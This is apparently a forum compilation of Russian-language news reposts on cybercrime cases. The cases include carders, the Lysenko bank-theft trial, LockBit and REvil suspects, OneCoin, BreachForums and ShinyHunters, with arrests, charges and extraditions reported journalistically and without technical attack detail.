Задержанному задали вопрос, есть ли какие-то политические мотивы в привлечении его за хищение денежных средств с банковских счетов граждан Польши, Франции, Великобритании. "Я не думаю, что у них пропали деньги со счетов по политическим мотивам, - уточнил Кадария. - Я лично этого не делал. Это, видимо, адвокаты, которые пытались как-то бороться с экстрадицией. Почему-то без моего ведома решили пойти по такому пути, чтобы меня как-то удержать в Кыргызстане, чтобы меня не экстрадировали. Я могу это только так объяснить. Другого объяснения этому нет. Они решили придумать такую сказочку. Бред адвокатов - так и получается".
source: belta.by/incident/view/zaderzhan-karder-iz-minska-14-let- skryvavshijsja-ot-presledovanija-po-vsemu-miru-557218-2023
ВЧК-ОГПУ стало известно, что задержанный за 100-миллионую взятку начальник отдела контрразведки Пермского УФСБ Григорий Царегородцев крышевал крупную хакерскую группировку, торговавшую информацией с банковских карт. Они платили ему за покровительство, а потом передали 100 млн рублей за свое освобождение.
В феврале 2022 стало известно о разгроме очередной банды хакеров-кардеров. Были задержаны 6 членов группировки: предприниматель Владислав Гилев, основатель крупной конторы по продаже металлоконструкций Артем Быстрых, гендиректор «Кинокомпании «Саратовфильм» Денис Пачевский, коммерсант Александр Ковалев, безработный Ярослав Соловьев и глава известной пермской IT-конторы Гет-Нэт Артем Зайцев. Тверской суд Москвы арестовал всех шестерых подозреваемых в рамках дела №12201007754000092, возбужденного по статье 187 ч.2 - неправомерный оборот средств платежей.
Как удалось выяснить ВЧК-ОГПУ, хакеры продавали данные европейских и американских карт, а также похищали с них деньги. Работа шла через два сайта - trump-dmps.ru и fe-accl8.ru. Трафик с них шел к дата-центру, база которого принадлежит ООО «Гет-Нэт» Зайцева. В Перми это известный программист, а его компания поставляет услуги местному ФСБ. Например, в 2016 чекисты закупали у Зайцева каналы связи, а в следующем году арендовали помещения.
После задержания хакеров, следователи МВД стали замечать странный интерес к теме со стороны начальника отдела ФСБ по Пермскому краю. Григорий Царегородцев всячески пытался перевести задержанных в СИЗО Перми под предлгом проведения неких мероприятий. Оказалось, что Царегородцев за ежемесячные платежи выступал "крышей" группировки хакеров.
Более того, засекреченный по делу свидетель: девушка (С.Л.С.) рассказала, что Владислав Гилев, возглавлявший ранее торгово-строительную компанию Уралэнергострой (одного из партнеров Транстехкома Быстрых), передал Царегородцеву 100 млн рублей наличкой. Передачу осуществлял их общий знакомый, партнера Гилева по бизнесу, Александр Ковалев. Также, по словам свидетеля, через нее Царегородцев пытался успокоить хакеров, утверждая, что прилагает все усилия, чтобы их вытащить из тюрьмы. Однако, после года нахождения за решектой и многократных отклонений судом ходатайств защиты и апелляций по поводу смягчения меры пресечения, задержанные, предположительно, решили «слить» своего куратора и сдали факт передачи денег, предназначавшихся на подкуп следователей.
Царегородцева арестовали до 7 ноября.
На фото Пачевский, Быстрых, Зайцев.
15 лет колонии строгого режима запросило обвинение для уроженца Украины Юрия Лысенко, обвиняемого в создании преступного сообщества хакеров, похитивших через интернет у ряда крупных российских банков более 1 млрд руб. Для его 13 сообщников прокурор запросил от 6,5 лет до 12 лет. Впрочем, адвокаты настаивают на невиновности подзащитных, утверждая, что те стали жертвой оговора их бывшего подельника, давшего показания на остальных в рамках досудебного соглашения.
По версии следствия, организатором ОПС является неработающий гражданин Украины Юрий Лысенко. По материалам дела, в период с июля по ноябрь 2014 года он вовлек в деятельность ОПС около двух десятков россиян для совместного хищения средств коммерческих банков. Следствие считает, что деньги похищались с помощью специальной программы, которая позволяла снимать их со счетов клиентов банков, а затем восстанавливала баланс за счет средств уже самих финансовых структур.
Как пояснила в суде прокурор, фигуранты могли положить на карту банка 200 тыс. руб., после чего перевести их на другую карту. Потом запускалась троянская программа, отменявшая трансакцию. Посчитав, что перевод не удался, банки возвращали на счет отправителя эти деньги, но уже из собственных средств. В результате на руках хакеров оказывалась вдвое большая сумма. Таким способом, по подсчетам следствия, было похищено более 1 млрд руб. Кроме того, говорится в деле, с марта по июль 2015 года хакеры присвоили еще более 5,7 млн руб. путем установки в различных банкоматах специальных устройств, позволяющих управлять процессом выдачи банкнот. Как было установлено следствием, в целом от действий ОПС пострадали Промсвязьбанк, банки «Зенит», «Траст», «Уралсиб» и ряд небольших кредитных учреждений, признанных теперь потерпевшими по делу.
Перед судом в итоге кроме Юрия Лысенко предстали 13 человек: Евгений Воробьев, Иван Крылов, Артем Мазуренко, Михаил Воробьев, Антон Екименко, Денис Гринев, Максим Усатов, Сергей Махничев, Николай Миловидов, Михаил Орешкин, Олег Родин, Никита Хаджибекян и Сергей Чистов. В зависимости от роли каждого прокурор просил признать их виновными по ч. 1 и ч. 2 ст. 210, ч. 4 ст. 159.6, ч. 3 ст. 30 и ч. 4 ст. 158 УК РФ (организация преступного сообщества и участие в нем; мошенничество в сфере компьютерной информации; кража). Для предполагаемого организатора ОПС Лысенко гособвинитель потребовал 15 лет колонии строгого режима, Хаджибекяна, Миловидова и Орешкина, содержавшихся, как и Лысенко, под стражей — приговорить к лишению свободы на сроки от 7 до 12 лет. Для оставшихся десяти фигурантов, которые находятся под подпиской о невыезде и на процесс приходят самостоятельно, гособвинение запросило от 6,5 лет до 10 лет колонии общего режима.
Теперь в суде должны выступить адвокаты. Поскольку большинство обвиняемых своей вины не признало, защита постарается доказать непричастность подсудимых к преступлениям. При этом адвокаты будут ссылаться на противоречия в судебной экспертизе, где утверждается, что хакеры создали на базе программ Montero и Software собственную, позволявшую отменять трансакцию при переводе денег с карты на карту. При этом, по данным защиты, сами производители программ Montero и Software в ответах на адвокатские запросы утверждали, что подобная хакерская программа не могла существовать в принципе. Причем этот тезис якобы подтвердили и российские эксперты в суде. Зато автор экспертизы, назначенной судом, для дачи пояснений на процесс так и не явился.
Также защита намерена опровергнуть обвинение Лысенко в создании ОПС, поскольку из материалов дела следует, что его предполагаемые участники до задержания в 2015 году не были знакомы друг с другом. Да и денег у них не нашли, несмотря на то что следствие утверждает, будто один лишь Юрий Лысенко присвоил не менее 800 млн руб. Впрочем, обвинение считает, что отсутствие связи между некоторыми обвиняемыми — следствие хорошей конспирации в ОПС, а деньги его организатор просто успел перевести на родину.
Между тем адвокаты, опровергая участие их подзащитных в ОПС, утверждают, что все эти данные следствию сообщил лишь пошедший на сотрудничество Антон Тестов, уже осужденный на семилетний срок. Но он, по мнению защиты, мог намеренно оговорить бывших подельников, чтобы облегчить свою участь.
В обмен на журналистов, правозащитников и оппозиционеров, а также бывшего
американского морпеха, западные страны согласились отдать:
- Вадима Красикова (из Германии, «киллер на велосипеде»
- Артема Дульцева (из Словении),
- Анну Дульцеву (из Словении),
- Михаила Микушина (из Норвегии),
- Павла Рубцова (из Польши),
- Романа Селезнева (из США),
- Владислава Клюшина (из США),
- Вадима Конощенка (из США).
Источник: https://t.me/theinsider/30830
Видео хуевого качества: прилет спецборта "Россия" сегодня в Анкару: https://t.me/ru2ch/119239
Spoiler: Спойлер для поклонников Навального
По данным СМИ, Россия освободила:
— Эван Гершкович;
— Владимир Кара-Мурза;
— Лилия Чанышева;
— Илья Яшин;
— Ксения Фадеева;
— Андрей Пивоваров;
— Пол Уилан;
— Алсу Курмашева;
— Олег Орлов;
— Саша Скочиленко;
— Дитер Воронин;
— Кевин Лик;
— Рико Кригер;
— Патрик Шёбель;
— Герман Мойжес;
— Вадим Останин.
Таймлайн по обмену: https://www.gazeta.ru/politics/2024/08/01/19491667.shtml
Правоохранительные органы США арестовали в штате Аризона россиянина Руслана Астамирова, который, по версии следствия, якобы причастен к кибератакам и использованию вирусов-вымогателей. Об этом говорится в распространенном в четверг заявлении прокуратуры штата Нью-Джерси.
"Министерство юстиции сегодня объявило о предъявлении обвинений гражданину России за его участие в распространении многочисленных вирусов-вымогателей LockBit и совершении других кибератак на компьютерные системы жертв в США, а также Азии, Европе и Африке", - утверждается в документе.
"Астамиров был арестован в Аризоне и должен предстать перед судом округа штата Аризона", - добавили в прокуратуре.
source: justice[.]gov/opa/pr/russian-national-arrested-and-charged-conspiring- commit-lockbit-ransomware-attacks-against-us
Американские правоохранители внесли основательницу криптовалютного проекта OneCoin и самопровозглашенную "криптокоролеву" Ружу Игнатову в список 10 самых разыскиваемых преступников США. Ее обвиняют в организации мошеннической схемы на $4 млрд.
Фотография и данные Игнатовой появились на сайте ФБР, а за любую информацию, которая приведет к ее аресту, обещают до $100 тыс. вознаграждения. Не исключено, что она может находиться в сопровождении вооруженной охраны и даже сменила внешность благодаря пластической хирургии.
"Сегодня ФБР объявило о добавлении Ружи Игнатовой в список десяти самых разыскиваемых беглых преступников за ее предполагаемое руководство масштабной мошеннической схемой", – говорится в объявлении. Отмечается, что жертвами OneCoin стали миллионы инвесторов по всему миру.
OneCoin была основана в 2014 году. Три года ею управляла сама Игнатова, но в 2017 году суд Нью-Йорка издал ордер на арест женщины и компанию возглавил ее брат Константин Игнатова – в 2019 году его задержали по обвинению в мошенничестве с использованием средств коммуникации, мошенничестве с ценными бумагами и отмывании денег. Впоследствии мужчина частично признал вину.
Сама же Ружа Игнатова находится в бегах с 2017 года. Узнав, что ее возлюбленный тоже пошел на сотрудничество с ФБР в рамках расследования в отношении OneCoin, она села на самолет в Грецию и с тех пор ее никто не видел.
Федеральный прокурор Манхэттена Дэмиен Уильямс называет OneCoin одной из крупнейших схем Понци в истории. Основная бизнес-модель проекта заключалась в продаже образовательных пакетов по криптовалютному трейдингу, при этом участники получали реферальные комиссии за привлечение новых лиц и продажу пакетов.
Следователи называют пострадавшими в результате аферы 3 миллиона человек. Причем выручка OneCoin в 2014-2016 годах составила 3,4 млрд евро, а прибыль – 2,2 млрд евро. Деньги могут находиться у Игнатовой.
"Она идеально рассчитала момент для запуска своей схемы и извлекая выгоду от безумных спекуляций первых дней взлета криптовалюты", – говорит прокурор.
Ружа имеет немецкий паспорт, но в Европе ей находиться опасно – в мае Европол тоже внес ее в список особо разыскиваемых преступников в связи с расследованием в отношении OneCoin. Впрочем, по состоянию на 1 июля женщина исчезла из базы полицейской службы Евросоюза.
source: fbi.gov/wanted/topten/ruja-ignatova
В марте полиция США арестовала Конора Брайна Фитцпатрика , основателя и владельца хакерской площадки BreachForums, известного под ником «pompompurin», за его участие в курировании форума.
Хотя обвинение Фитцпатрика несколько раз откладывалось, один раз, как сообщается, из-за попытки самоубийства, документы судебного заседания от 13 июля пролили новый свет на это дело.
По последней информации , Фицпатрику было предъявлено обвинение в заговоре с целью совершения мошенничества с устройствами доступа, мошенничестве с устройствами доступа, ведущем к вымогательству, и хранении детской порнографии. Сообщается, что Помпомпурин признал себя виновным по всем трем пунктам.
В то время как первые два пункта обвинения были очевидными, последний пункт вызвал у некоторых удивление.
В судебном протоколе говорится, что устройства Фитцпатрика содержали «видео, на которых изображены несовершеннолетние подростки и дети, не достигшие 12-летнего возраста, участвующие в откровенно сексуальном поведении». По информации суда, на устройствах Помпомпурина также хранилось более 600 изображений с детской порнографией.
Суд над Фитцпатриком назначен на 17 ноября. На данный момент он не заключен в тюрьму, а находится под залогом в размере $300 000 с дополнительными ограничениями, такими как отсутствие доступа к компьютеру, отсутствие контактов с несовершеннолетними, отсутствие доступа к веб-сайтам, посвященным утечкам данных, и запрет на использование VPN.
source:
databreaches.net/owner-of-breachforums-pleads-guilty-in-federal-court-to-a-
charge-that-shocks-everyone
twitter.com/nosuchagency2/status/1679745648814333953
Участник группировки ShinyHunters ждёт окончательного приговора, находясь под стражей
1 июня 2022 года 21-летний студент-информатик Себастьян Рауль был арестован по возвращении из отпуска в аэропорту Рабата в Марокко. По данным издания OBS , сейчас Рауль находится под стражей в тюрьме Тифлет 2 в Марокко.
Рауль уже несколько месяцев находится под прицелом ФБР. Он подозревается в том, что является «одним из важных членов» хакерской группы ShinyHunters , которую американские власти представляют как «продуктивных киберпреступников».
О ShinyHunters стало известно весной 2020 года, когда группа выставила на продажу в дарквебе около 200 млн. украденных данных после взлома IT-систем множества компаний по всему миру.
США требуют экстрадиции Рауля по обвинениям в «заговоре с целью совершения электронного мошенничества», «электронном мошенничестве» и «краже личных данных». Согласно расследованию ФБР, преступления могли быть совершены с французских и марокканских IP-адресов, которые могут быть связаны с Себастьяном Раулем. Американские следователи также получили доступ к сообщениям на форумах, приписываемым Раулю, в которых он делился информацией об украденных данных.
В США Себастьяну Раулю грозит 116 лет тюрьмы за приписываемые ему действия. По словам отца Себастьяна, Рауль отрицает все обвинения и утверждает, что его аккаунты использовались без его ведома.
«Запрос о передаче студента США фактически является пожизненным заключением, запрещенным статьей 3 ЕКПЧ (Европейская конвенция о правах человека)», — заявил адвокат Рауля Филипп Охайон.
По словам адвоката, во Франции Рауль может получить максимум 5 лет тюрьмы, поэтому Охайон потребовал экстрадиции студента во Францию. 29 июля 2022 года прокурор Республики Эпиналь (Франция) получил запрос адвоката и в ближайшее время примет решение о судьбе Себастьяна Рауля.
source: nouvelobs.com/justice/20220728.OBS61435/un-etudiant-francais-accuse-d- un-vaste-piratage-par-le-fbi-arrete-au-maroc.html
Киберпреступник заявил, что у него пропали накопления после визита силовиков.
В отношении бывшего сотрудника УФСБ по Самарской области Демина возбудили уголовное дело. Силовика подозревают в хищении криптовалюты у киберпреступника. Об этом сообщает издание ВолгаНьюс со ссылкой на региональное управление ФСБ.
По версии следствия, работник силовой структуры участвовал в раскрытии киберпреступления. Подозреваемым был житель Сызрани Мочалов, к которому явились работники ФСБ и задокументировали преступление. Затем хакер заявил, что его криптовалюта после визита правоохранителей пропала. Ущерб оценивается в сотни миллионов рублей.
Во время судебного разбирательства криптовалюта вернулась к Мочалову. Однако
представители Главного военно-следственного управления начали выяснять детали
случившегося. Уголовное дело Демина было передано в Москву.
Напомним, что в октябре 2021 года Сызранский городской суд признал Мочалова
виновным в распространении вредоносных компьютерных программ и приговорил к
одному году ограничения свободы.
source: volga.news/article/621104.html
Минцифры России разработало проект постановления, в соответствии с которым провайдеры хостинга будут обязаны устанавливать личность своих клиентов. Эта обязанность вступит в силу с 1 декабря 2023 года.
Согласно проекту, опубликованному на сайте regulation.gov.ru, идентификация может осуществляться четырьмя способами:
https://regulation.gov.ru/Regulation/Npa/PublicView?npaID=142093
Ужесточение регулирования хостинг-провайдеров произошло после внесения поправок в федеральные законы «О связи» и «Об информации», которые были подписаны Путиным 31 июля. В соответствии с этими поправками, Роскомнадзор будет вести реестр хостеров. Кроме того, хостинг-провайдеры будут обязаны взаимодействовать с силовыми структурами. Также был введен запрет на регистрацию пользователей сайтов, работающих в России, без использования электронной подписи.
Взято с securitylab.ru
Банду 19-летних скиммеров задержали в Мытищах — благодаря их же собственной тупости. Ребята делали миллионы, но попались на оплате продуктов веером краденых банковских карт.
Левый пластик одногодки Даня, Арина и Егор покупали в даркнете. Хитрыми уловками писали на нём чужие данные и снимали нал — 2,5 млн только в день задержания. С которыми они и отправились в продуктовый мытищинского ТЦ.
Крайне осторожные — они набрали вкусненького и совсем не привлекая внимания начали оплачивать всё это пасьянсом из карт: много раз по 999 рублей, чтобы не вводить ПИН-код. Кассир всё сразу поняла и вызвала полицию. Троицу задержали, нашли у них сотню карточек и много пятитысячных. Теперь им предстоит объяснить товарищу майору, какой Гудини их научил трюкам и почему они так плохо выступают на публике.
• Source: https://t.me/breakingmash/39808
После того, как Федеральная служба безопасности России (ФСБ) в январе нынешнего года нейтрализовала вымогательскую группировку REvil (Sodinokibi), восточноевропейские киберпреступники почувствовали тревогу. В течение нескольких дней после действий ФСБ исследователи из Trustwave SpiderLabs анализировали разговоры в даркнете и обнаружили, что в сообществе киберпреступников царит страх.
Киберпреступники в даркнете еще в ноябре 2021 года обсуждали секретные переговоры между властями РФ и США и призывали друг друга готовиться к потенциально серьезным действиям со стороны России.
По словам одного из комментаторов, все требовавшие выкуп вымогатели будут арестованы в течение 2022 года, а самые «невезучие» — в ближайшие два месяца.
Опасения некоторых киберпреступников вызваны также сообщением об одном из администраторов подпольного форума, который предположительно сотрудничал с правоохранительными органами.
«Публикую часть своей личной переписки, без его согласия, так как он пропал бесследно, скорее всего благодаря человеку под псевдонимом RED\KAJIT. Он администратор форума ****, который работает на правоохранительные органы против простых работяг», — сообщил один из пользователей.
Поскольку многие администраторы имеют доступ к контактной информации участников форума, подобная обеспокоенность вполне понятна. Если участники форума больше не доверяют друг другу, им определенно будет труднее вести бизнес на хакерских форумах.
Киберпреступники больше не верят, что Россия является убежищем для их деятельности. Некоторые злоумышленники стали обсуждать положительные и отрицательные стороны переноса своих операций в Индию, Китай, на Ближний Восток или даже в Израиль.
Участники форума обменялись многочисленными советами о том, как обезопасить себя, если российские правоохранительные органы продолжат активно бороться с киберпреступностью. В дополнение к поиску нового места для работы, участники форума предложили использовать ПО Tor для сохранения анонимности, удалять старые сообщения, а также отказаться от хранения всех украденных данных на одном компьютере.
Несколько участников форума также раскритиковали действия REvil, которые привели к ее краху, и призвали других не подражать поведению группировки. По мнению участников форумов, самый большой провал REvil произошел из-за широко разрекламированного хвастовства своими достижениями и нападения на многомиллиардные корпорации, расположенные в странах.
Один из участников форума предположил, что операция ФСБ на самом деле была сфальсифицирована или была всего лишь «шоу» для международного просмотра. Данная мысль вселяет в преступников надежду на то, что спецоперация правоохранительных органов не закончится серьезными наказаниями для задержанных.
Специалисты команды SpiderLabs компании Trustwave провели анализ подпольных русскоязычных киберпреступных форумов. Хакеры до недавнего времени могли рассчитывать на то, что правительство будет закрывать глаза на их деятельность, однако теперь это может закончиться.
Эксперты проанализировали на ряде форумов новые сообщения между киберпреступниками из Восточной Европы касательно недавнего диалога между президентом США Джо Байденом и президентом России Владимиром Путиным. Часть киберпреступников обеспокоена тем, что российские власти активно их преследуют.
Участники форума обсуждают, как подготовиться к возможности быть арестованным или к потенциальному судебному приговору за совершенные преступления. Одна из публикаций в даркнете на форуме Exploit гласит: «Все решается втихаря, в кабинетах. А кто какие игры ведет в закулисье... — бессмысленно гадать. Мы не знаем (всего). Кстати, вот — недавние тайные переговоры о киберпреступности РФ и США тому пример».
Однако некоторые хакеры не испугались. В еще одной публикации автор призвал других участников форума не бояться и предположил, что в России не будут сажать членов вымогательских группировок. По словам хакеров, «никто рансомварщиков в ру не будет закрывать, максимум попросят быть тише и делиться».
Злоумышленники хорошо осведомлены о растущем внимании властей США к борьбе с киберпреступностью в нынешнем году, что уже привело к нейтрализации группы вымогателей REvil.
Восточноевропейские киберпреступники все больше чувствуют себя в ловушке, особенно потому, что Россия не имеет договора об экстрадиции с США и поэтому является для них одним из очень немногих «убежищ».
• Source: [https://www.trustwave.com/en-us/res...ioning-whether-there-is-a- safe-haven-anymore/](https://www.trustwave.com/en- us/resources/blogs/spiderlabs-blog/law-enforcement-collaboration-has-eastern- european-cybercriminals-questioning-whether-there-is-a-safe-haven-anymore/)
Разыскиваемый ФБР Евгений Полянин наслаждается жизнью класса "люкс" в родном городе.
Один их самых разыскиваемых ФБР "русских хакеров" Евгений Полянин преспокойно живет в Барнауле, наслаждаясь жизнью класса "люкс", и не похоже, чтобы за ним кто-то охотился. К такому выводу пришли журналисты британского издания Daily Mail, решившие сами найти злополучного россиянина, против которого ранее в этом месяце в США были выдвинуты обвинения в атаках с использованием вымогательского ПО и отмывании денег.
Как сообщает Daily Mail, 28-летний Полянин живет припеваючи в собственном доме за $380 тыс. в Барнауле и ездит на Toyota Land Cruiser 200 за $74 тыс. Кроме того, в его распоряжении есть второй автомобиль - BMW за $108 тыс. Его жена София, с которой они вместе еще со времен учебы в Алтайском государственном университете, открыто ведет бизнес по продаже тортов. Пара наслаждается жизнью и устраивает прогулки на вертолете над Алтайскими горами.
По данным ФБР, Полянин является партнером киберпреступной группировки REvil/Sodinokibi. За информацию, которая помогла бы его арестовать, бюро объявила награду в размере до $5 млн.
Россиянин должен стать своего рода примером сотрудничества Владимира Путина с президентом США Джо Байдена в борьбе с киберпреступностью (согласно российскому законодательству, "гражданин РФ не может быть выслан за пределы РФ или выдан другому государству"). Тем не менее, как показывают результаты журналистского расследования Daily Mail, российские власти не спешат арестовывать Полянина. Так, по словам его родственников и соседей, ни полиция, ни ФСБ не опрашивала их в связи с какими-либо обвинениями ФБР.
Как сообщает издание, последние несколько дней чета Поляниных всеми возможными способами отбивалась от журналистов, забаррикадировавшись в своем доме в фешенебельном жилищном комплексе "Невский" (адрес дома случайно "слила" в соцсети сама София). Евгений не брал трубку и отчетливо дал понять, что на интервью он не согласен. При этом он связался со своей матерью Светланой, скромной 58-летней пенсионеркой из Барнаула, и уверил ее в том, что все обвинения ФБР против него ложные.
Когда власти США выдвинули обвинения против Евгения Полянина, Светлана отрицала, что ее сын работает программистом, а затем и вовсе отказалась обсуждать его работу. По ее словам, она не знает, где Евгений сейчас. "Возможно, он в полиции", - заявляла Полянина. Однако через некоторое время она сообщила журналистам, что Евгений связался с ней и уверил в том, что все обвинения против него - ложь, а сам он сейчас на отдыхе.
Несмотря на наличие у Полянина шикарного дома, прописан он в квартире матери в доме советской постройки, где раньше выдавалось жилье сотрудникам МВД.
35-летняя сестра Полянина, Анна, также заявляет, что с ней никто не связывался по поводу обвинений в отношении ее брата, и отказывается общаться с прессой.
По словам одногруппников и преподавателей, в студенческие годы Евгений Полянин не показывал выдающихся способностей в программировании, больше интересовался спортом, и обвинения в хакерстве очень их удивили.
Полянин так и не окончил магистратуру по вычислительной технике на физико- техническом факультете Алтайского государственного университета. В 2014 году он внезапно удалил все свои страницы в соцсетях, а через пять лет зарегистрировался как индивидуальный предприниматель в сфере "разработки компьютерного ПО" и "IT-консалтинга".
Журналисты Daily Mail обратились в ФБР с вопросом, что будет теперь, когда местонахождение Полянина установлено. Представители бюро пока не ответили.
В Болгарии по запросу США арестован хакер из Санкт-Петербурга
Арестованный в Варне по американскому ордеру гражданин России — это Александр Жуков, известный в хакерской среде под ником Nastra. Власти США подозревают его в махинациях с рекламой в интернете, ущерб от которых мог превысить $7 млн. Если хакер не сдаст ФБР своих сообщников, ему грозит до 20 лет заключения.
Господина Жукова задержали 6 ноября, после чего областной суд Варны продлил его содержание под стражей на 24 часа, санкционировав при этом изъятие всей компьютерной техники, которая находилась в доме Nastra. Затем срок задержания был продлен еще на день. На заседании представители обвинения предложили господину Жукову согласиться на добровольную экстрадицию в США, но он предложение отклонил. После этого суд вынес решение о предэкстрадиционном аресте подозреваемого на один месяц.
В запросе о выдаче господина Жукова говорится, что он подозревается в совершении компьютерного мошенничества в период с сентября 2014 года по декабрь 2016 года, за которое ему грозит до 20 лет заключения. Власти США объявили хакера в международный розыск, а суд Нью-Йорка санкционировал его заочный арест.
В теневом интернете Александр Жуков известен под ником Nаstra. Свой ник хакер образовал от имени известного предсказателя Нострадамуса. Как рассказал один из его знакомых, господин Жуков — уроженец Санкт-Петербурга, который отслужил в армии и «начал добывать деньги в интернете примерно 20 лет назад».
Nastra, «весельчак, с отличным чувством юмора, о котором никто плохого слова не скажет». По его словам, хакер отличался от своих коллег относительной чистоплотностью в выборе средств заработка. Во всяком случае, «он не совершал хищения с кредитных карт и не размещал детское порно, но его работа не всегда была чистой с точки зрения закона», вспоминает его знакомый.
Примерно в 2010 году, он переехал в Болгарию и осел в Варне, где купил квартиру. Никаких больших денег Nastra не зарабатывал, жил тихо, и его даже стали понемногу забывать. Однако несколько лет назад, через неких американских посредников он стал получать подряды на фальсификацию статистки просмотров видеорекламы, размещенной в интернете. Суть этой аферы состоит в том, чтобы показать компании-заказчику большие просмотры ее роликов, которые на самом деле «нагоняются» с помощью ботов.
По словам знакомых, Nastra, выполняя работу примерно за $20 тыс. в месяц, «не стал использовать стандартные схемы, а креативил». Обычно подобная накрутка просмотров происходит с помощью заражения чужих компьютеров специальным вирусом. Nastra, купив более полусотни серверов, с их помощью сам нагонял просмотры.
Креатив хакера и сыграла с ним злую шутку. Поругавшись из-за оплаты своей работы с американскими посредниками, Nastra «включил серверы на полную мощность», нагоняя за день миллионы просмотров. В результате компании поняли, что стали жертвой обмана со стороны рекламных агентств, и обратились в правоохранительные органы. Прокуратура и ФБР, в свою очередь, рассчитывают получить от господина Жукова данные на его клиентов. Признание и сотрудничество позволят избежать ему крупного наказания.
Как заявили в российском консульстве в Варне, его работники находятся в контакте с адвокатом, защищающим господина Жукова, а консульство оказывает «всестороннюю поддержку» россиянину.

На видео показана белая яхта, покачивающаяся в голубых водах Средиземного моря. Молодые люди резвятся на палубе, смеются, пьют и прыгают в воду. Это дорогое удовольствие: Аренда яхты стоит 1 300 евро в день. Этим видео поделилась в социальных сетях Екатерина К.*, в чьем аккаунте часто появляются подобные ролики об отдыхе. Это видео снято в Анталии, на южном побережье Турции, но другие были сделаны из пятизвездочного отеля в Дубае, с Крымского полуострова или даже с Мальдив.
Ее муж Николай К. часто появляется на видео и фотографиях, которые она публикует. Похоже, он предпочитает футболки от Gucci, роскошные спортивные автомобили BMW и большие солнцезащитные очки. Последние несколько месяцев он также носит на запястье часы Vanguard Encrypto - тип роскошных часов, на циферблате которых выгравирован код адреса биткоина, а их стоимость достигает 70 000 евро. Личный счет Николая К. является закрытым, но его девиз открыт для всех и ясно показывает его веру в криптовалюты, такие как биткоин, с помощью которых он зарабатывает свои деньги.
В данном случае, однако, более точным термином может быть "вымогательство". Согласно репортажу, проведенному совместно немецкой общественной вещательной компанией Bayerischer Rundfunk и ZEIT ONLINE, Николай К. входит в группу онлайн-вымогателей, которые зарабатывают на своих преступлениях многие миллионы евро и почти никогда не попадаются. Николай К. - один из крайне редких случаев, когда удалось установить личность преступника, совершившего почти идеальное преступление.
Следователи из Управления уголовной полиции земли Баден-Вюртемберг (LKA) убеждены, что Николай К. входит в основную группу преступников, которые используют программное обеспечение для выкупа под названием REvil. С помощью этого вымогательского программного обеспечения эта основная группа вместе с другими сообщниками атаковала компании и учреждения по всему западному миру и собрала огромные суммы денег.
Нет слишком больших или слишком маленьких компаний, чтобы подвергнуться атаке
В последние годы преступные группировки, использующие ransomware, стали настоящей чумой. Ни одна компания, ни одна городская администрация, ни одна организация не является слишком большой или слишком маленькой, чтобы подвергнуться атаке и, в худшем случае, быть полностью парализованной. Преступники тайно проникают в иностранные компьютерные сети, копируют все данные, а затем шифруют систему. Компьютеры, являющиеся частью этой системы, становятся бесполезными. Городские администрации не могут выполнять свою работу, медицинские учреждения и юридические фирмы разоряются, заводы останавливаются, а больницы не могут получить доступ к историям болезни пациентов. Тем, кто платит вымогателям, высылается ключ для доступа к данным - если повезет. Те, кто не платит, рискуют тем, что их конфиденциальная информация будет опубликована или взломанный доступ к их сетям будет продан другим преступникам.
Существует несколько разновидностей этого вида выкупного ПО. REvil, известная также под названием Sodinokibi, является одной из самых опасных и несет ответственность за многомиллиардный ущерб по всему миру. Федеральное ведомство по информационной безопасности Германии (BSI) классифицирует REvil как одну из самых опасных программ в этой области. В Германии она была использована в 2019 году для атаки на DRK Trägergesellschaft Süd-West - IT-компанию, обслуживающую врачебные кабинеты и больницы. Несколько клиник в западной немецкой земле Рейнланд-Пфальц и в юго-западной земле Саар были вынуждены отключить свои компьютерные системы и перейти на экстренный режим работы.
Неизвестно, кто первым разработал код для REvil. Но существует основная группа, которая продает его всем желающим использовать его для вымогательской деятельности. Разработчики создали прибыльную модель аренды: Преступники могут договориться с группой об использовании программного обеспечения за плату в криптовалюте - такая модель называется "ransomware как услуга". И Николай К., по всей видимости, входит в число тех, кому выплачиваются такие преступные арендные платежи.
Репортеры из Bayerischer Rundfunk и ZEIT ONLINE провели несколько месяцев, отслеживая цифровые следы в социальных сетях, на анонимных каналах Telegram и в мире криптовалют. Журналистам удалось установить, что биткоин по меньшей мере в шести случаях переводился со счетов, связанных с криминальными структурами, на адрес, который, скорее всего, принадлежит Николаю К.
Если вы погуглите имя, которое он использует в социальных сетях, вы найдете адрес электронной почты, используемый для регистрации различных веб-сайтов. Эти сайты связаны с несколькими российскими номерами мобильных телефонов. И один из этих мобильных номеров ведет к аккаунту в Telegram, на котором был опубликован адрес Биткойна. На этот счет было перечислено более 400 000 евро в Биткоинах. Эксперты из компании, специализирующейся на оценке биткоин-платежей и помогающей следователям в таком анализе, говорят, что эти деньги, скорее всего, являются продуктом вымогательства.
Именно такие биткоин-транзакции изначально вывели LKA Баден-Вюртемберга на Николая К. Следователи изучают атаку на Штаатстеатр в Штутгарте в 2019 году, в которой использовалась более ранняя версия REvil под названием Gandcrab. Компьютеры театра были отключены на несколько дней, и сотрудники были вынуждены продавать билеты, написанные от руки. Считается, что в конечном итоге Штаатстеатр заплатил выкуп - 15 000 евро в криптовалюте - и LKA проследила за следами, оставленными этим платежом. Они привели к Николаю К. В то время хакерская группа была еще известна на международном уровне под именем Gandcrab, но следователи и эксперты по информационной безопасности считают, что та же группа теперь ответственна за REvil.
Ransomware как услуга
Несмотря на активизацию международных усилий, властям редко удается найти исполнителей атак с использованием программ-выкупов. А когда им это удается, они в основном ловят мелкую рыбешку, так называемых аффилированных лиц, как это было в двух недавних случаях в Украине и Канаде. Эти филиалы арендуют вредоносное ПО у настоящей преступной группы и затем перечисляют часть вымогаемого выкупа в обмен. Более крупная рыба, такие люди, как Николай К., до сих пор в основном оставались в тени, в основном потому, что они часто находятся в странах, которые не очень готовы к сотрудничеству, когда речь идет о расследовании и экстрадиции. Дело Николая К. также показывает, насколько трудно бывает арестовать и привлечь к ответственности лиц, стоящих за такими вымогательскими операциями.
Николай К. живет с женой в южном российском городе, в доме с бассейном. На
подъездной дорожке припаркован BMW мощностью более 600 лошадиных сил.
Единственный легальный бизнес, который можно найти в связи с его именем, - это
небольшой бар в недавно построенном жилом квартале в городе. Фотографии и
видео показывают просто обставленный бар, ориентированный на ставки на спорт -
не совсем то заведение, которое приносит огромные деньги. И уж точно не тот,
который мог бы финансировать образ жизни, демонстрируемый парой в социальных
сетях.
Следователи LKA из Штутгарта внимательно следят за социальными сетями в
надежде узнать, когда Николай К. отправится в отпуск в страну, которая имеет
соглашение о сотрудничестве с Германией и в которой он может быть арестован.
